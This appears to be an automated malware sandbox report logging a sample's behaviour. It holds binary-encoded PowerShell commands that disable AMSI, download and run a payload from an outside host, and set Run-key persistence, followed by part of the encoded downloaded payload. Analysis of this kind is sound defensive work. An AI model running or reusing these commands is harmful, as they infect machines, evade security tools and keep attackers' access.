cmdline	powershell $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01010000,01110010,01101111,01110100,01100101,01100011,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,01111100,01001001,01000101,01011000,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $gf)\|IEX
cmdline	"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\notepad.js"
cmdline	"C:\Windows\System32\cmd.exe" /c copy "C:\Users\test22\AppData\Local\Temp\notepad.js" "C:\Users\test22\AppData\Roaming\" /Y

Executes one or more WMI queries (1 event)

wmi	Select * from Win32_PingStatus where ((Address='google.com') And TimeToLive=80 And BufferSize=32)

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 10, 2021, 8:58 a.m.	show_type: 0 filepath_r: Powershell parameters: $gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01010000,01110010,01101111,01110100,01100101,01100011,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,01111100,01001001,01000101,01011000,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $gf)\|IEX filepath: Powershell	1	1
ShellExecuteExW Sept. 10, 2021, 8:58 a.m.	show_type: 0 filepath_r: powershell parameters: $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf)) filepath: powershell	1	1
ShellExecuteExW Sept. 10, 2021, 8:58 a.m.	show_type: 0 filepath_r: cmd parameters: /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\notepad.js" filepath: cmd	1	1
ShellExecuteExW Sept. 10, 2021, 8:58 a.m.	show_type: 0 filepath_r: cmd parameters: /c copy "C:\Users\test22\AppData\Local\Temp\notepad.js" "C:\Users\test22\AppData\Roaming\" /Y filepath: cmd	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 10, 2021, 8:58 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (9 events)

Data received	HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: public, max-age=31536000 expires: Fri, 09 Sep 2022 23:58:25 GMT content-type: application/x-javascript last-modified: Mon, 30 Aug 2021 22:35:24 GMT etag: "473a-612d5d2c-0;;;" accept-ranges: bytes content-length: 18234 date: Thu, 09 Sep 2021 23:58:25 GMT server: LiteSpeed referrer-policy: no-referrer-when-downgrade
Data received	HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: public, max-age=31536000 expires: Fri, 09 Sep 2022 23:58:28 GMT content-type: image/jpeg last-modified: Mon, 30 Aug 2021 22:12:00 GMT etag: "1fb27d-612d57b0-0;;;" accept-ranges: bytes content-length: 2077309 date: Thu, 09 Sep 2021 23:58:28 GMT server: LiteSpeed referrer-policy: no-referrer-when-downgrade
Data received	6%41%37%39%34%37%35%46%33%44%44%35%43%39%41%33%39%30%44%30%33%36%44%44%43%35%41%46%35%33%35%30%34%34%30%36%38%38%30%32%39%39%37%31%32%44%43%45%43%34%41%34%35%43%46%41%46%42%41%36%42%41%34%44%31%30%31%37%37%39%30%37%33%32%41%46%32%34%43%43%43%39%45%34%42%46%44%45%43%46%36%30%35%36%33%33%45%36%32%42%46%36%30%36%31%46%43%41%37%38%45%42%46%41%35%32%42%42%36%44%45%30%41%30%39%33%32%30%39%39%34%41%46%37%44%34%44%32%41%45%41%31%43%43%34%46%30%44%34%33%32%39%38%43%45%32%34%44%35%31%31%38%41%38%39%30%36%32%30%41%44%42%41%41%38%41%41%41%41%36%45%34%45%34%42%43%36%32%37%45%45%35%38%45%44%43%37%43%42%35%32%38%41%44%34%39%31%37%37%30%33%45%38%34%33%45%33%45%33%43%30%45%39%46%35%46%43%41%35%33%35%39%36%41%45%38%42%34%39%39%39%37%34%45%36%34%30%37%42%37%31%39%43%46%35%44%41%44%44%39%42%32%37%38%38%43%45%38%43%34%33%39%35%44%36%46%46%43%36%44%31%39%31%38%45%43%44%38%36%33%35%31%32%46%31%44%44%45%46%30%41%33%31%45%42%30%38%43%41%35%31%38%46%43%38%36%34%43%34%36%34%46%35%38%43%42%37%43%38%36%32%44%33%39%42%46%36%39%41%44%46%32%39%33%38%33%31%38%43%45%43%37%43%45%39%36%42%31%45%38%46%38%46%33%43%42%39%42%37%30%34%33%34%42%37%2D%2D%33%44%35%39%46%30%44%38%31%42%33%33%32%39%46%44%39%43%42%31%32%35%46%30%32%32%34%37%39%43%39%43%39%37%44%41%43%33%46%32%33%46%37%42%34%45%46%43%39%41%31%41%33%31%46%39%30%32%46%42%42%41%46%46%32%36%32%43%46%33%33%35%41%44%45%39%39%32%36%42%31%38%38%31%46%34%36%46%44%35%44%45%37%31%30%38%45%46%33%42%45%44%38%43%32%32%31%44%33%41%46%37%37%38%37%42%34%33%30%38%42%33%30%38%42%44%39%41%35%46%44%30%45%46%42%41%45%35%36%37%37%31%36%34%32%30%35%36%35%31%30%43%35%31%37%41%32%41%44%46%37%44%35%46%38%37%34%33%32%44%44%35%46%44%35%35%39%37%35%43%45%34%42%37%36%31%37%38%31%34%32%43%36%34%38%35%41%35%44%32%44%36%31%37%45%45%36%38%41%35%34%30%38%46%42%41%37%42%42%32%31%37%35%31%30%33%39%44%38%44%33%42%32%32%30%32%35%39%45%30%39%45%42%39%30%45%31%35%46%43%38%46%44%36%32%34%38%43%30%32%41%30%39%33%31%41%43%41%34%41%44%34%44%30%35%32%39%42%38%44%37%36%33%39%42%44%37%33%45%32%43%33%46%34%45%33%45%30%38%32%44%45%31%44%36%44%41%33%43%30%37%45%39%41%43%35%31%33%36%33%37%43%45%45%41%45%37%33%35%36%39%42%30%34%42%44%32%43%35%35%36%41%33%31%38%42%41%36%38%33%43%31%46%39%31%44%35%31%39%30%37%30%39%44%30%39%45%34%31%30%44%31%35%41%32%45%44%43%39%36%36%30%32%42%33%34%34%38%37%44%38%35%46%37%35%35%43%32%31%43%35%44%31%44%33%34%33%30%33%41%34%36%45%39%36%32%42%31%33%42%41%32%44%44%34%41%34%44%38%30%39%46%30%41%32%36%35%39%45%43%33%46%35%31%38%31%44%41%32%44%38%43%42%34%34%31%31%34%37%30%45%33%45%43%43%33%38%43%34%42%44%46%44%36%32%38%31%43%45%41%36%31%35%35%31%33%43%45%31%44%32%36%39%32%41%44%34%33%30%36%32%37%37%35%46%31%41%37%46%39%41%34%45%38%46%46%44%41%42%43%32%37%37%30%42%34%38%33%38%46%41%43%38%39%36%38%32%35%45%45%31%43%39%34%44%34%38%31%37%36%34%38%41%38%32%43%37%43%38%31%42%46%39%36%41%32%43%37%41%36%34%42%42%39%43%42%36%30%38%31%34%45%35%39%43%35%43%34%39%38%44%44%43%39%30%31%43
Data received	4%34%31%46%30%44%35%35%42%45%45%38%34%44%39%46%31%34%41%42%36%36%32%39%39%44%43%32%35%37%33%45%31%36%44%44%42%43%46%37%46%33%41%41%41%36%41%31%37%44%41%42%35%32%45%38%33%35%35%32%35%42%45%36%39%44%38%33%37%43%44%32%43%46%36%38%45%32%34%35%32%46%31%44%35%39%33%33%37%37%32%44%33%32%45%35%39%35%42%41%31%42%42%36%34%46%41%32%35%41%37%42%30%32%35%34%36%30%34%43%43%36%37%32%34%39%31%32%38%44%33%45%46%42%39%31%36%38%42%46%41%33%33%41%38%44%46%35%45%46%39%30%37%36%46%39%35%43%32%46%37%33%33%43%35%35%30%39%39%32%35%36%33%45%37%38%43%42%39%32%42%44%39%46%34%30%43%46%38%31%42%46%45%39%39%32%36%37%41%31%41%43%30%34%46%34%35%31%36%41%39%35%45%46%44%39%33%42%41%43%36%45%30%38%30%44%36%41%39%32%33%41%37%42%30%35%36%32%35%41%39%30%34%43%39%44%35%34%34%44%36%33%35%45%37%35%39%44%36%33%43%44%44%35%34%38%43%33%43%31%33%46%30%36%30%45%30%35%35%39%38%35%30%36%43%36%42%39%46%36%38%42%33%35%41%43%30%31%39%39%45%39%43%42%38%38%39%38%34%32%30%32%34%44%43%39%44%43%43%41%45%38%46%36%31%31%32%43%33%36%43%38%34%46%35%38%35%37%44%43%32%38%33%30%39%45%34%45%43%30%45%34%35%37%31%43%45%41%42%39%31%33%46%35%32%43%33%44%41%46%35%46%35%43%38%42%33%43%34%31%32%30%38%41%41%38%32%45%33%31%31%36%45%42%41%43%45%44%46%35%35%31%31%31%45%39%46%35%41%43%46%39%44%32%36%42%39%31%32%45%31%32%38%30%45%34%36%37%34%32%31%37%32%44%42%31%35%34%37%39%36%34%38%38%32%36%32%41%30%37%31%36%30%45%37%30%38%41%38%32%37%36%35%37%34%43%35%32%31%36%34%38%34%45%41%41%35%36%34%37%30%44%43%45%42%36%45%39%31%36%37%39%30%43%45%37%41%46%34%35%2D%2D%34%45%37%46%33%41%44%32%42%32%30%33%34%33%35%46%37%31%46%33%34%30%31%42%41%37%33%30%46%46%34%45%32%39%31%44%39%37%42%39%41%31%37%46%38%44%31%38%43%35%33%39%31%30%41%38%43%35%36%46%34%36%35%43%44%37%42%39%46%41%38%33%44%42%42%31%31%45%41%44%32%45%39%45%34%42%45%37%45%46%41%42%45%46%35%30%39%30%42%32%43%34%45%35%31%39%39%38%34%31%33%46%39%32%45%44%43%35%31%37%39%46%42%35%33%32%34%33%33%36%34%38%32%44%44%38%30%43%36%45%35%45%43%30%44%45%34%46%35%38%34%39%32%42%30%43%38%46%32%33%44%39%41%35%41%34%46%44%45%44%46%41%38%31%30%31%34%42%43%33%38%37%30%33%30%37%37%33%32%42%32%36%34%43%46%41%39%30%36%30%31%46%30%44%31%39%42%45%31%30%42%36%36%32%43%44%35%46%37%41%33%41%41%39%30%39%41%44%41%41%30%42%42%42%35%46%30%39%32%34%34%45%42%38%32%41%33%34%41%33%43%35%41%44%38%46%34%30%35%36%45%32%39%39%38%43%30%31%34%43%32%32%31%43%33%44%44%43%35%30%34%36%42%32%42%31%30%32%37%41%42%34%36%41%34%42%32%36%33%45%33%37%30%36%42%35%35%41%31%37%36%36%42%37%41%38%38%37%30%35%45%46%32%45%39%39%37%36%43%34%42%34%42%44%35%42%32%35%32%33%33%33%42%38%38%39%36%41%35%44%44%33%36%33%30%41%42%30%37%35%46%35%42%44%45%36%46%33%42%46%45%39%38%31%39%36%31%44%32%37%36%38%44%30%45%39%36%30%32%39%43%35%46%35%32%38%34%38%34%33%41%44%31%44%44%31%41%43%34%45%37%42%36%35%39%45%39%33%32%39%34%2D%2D%46%30%32%44%2D%2D%45%42%39%41%43%45%46%45%39%37%45%43%36%38%42%34%34%36%35%39%34%37%30%36%46%45%33%2D%2D%38%41%41%35%30%46%42%46%42%32%34%44%37%31
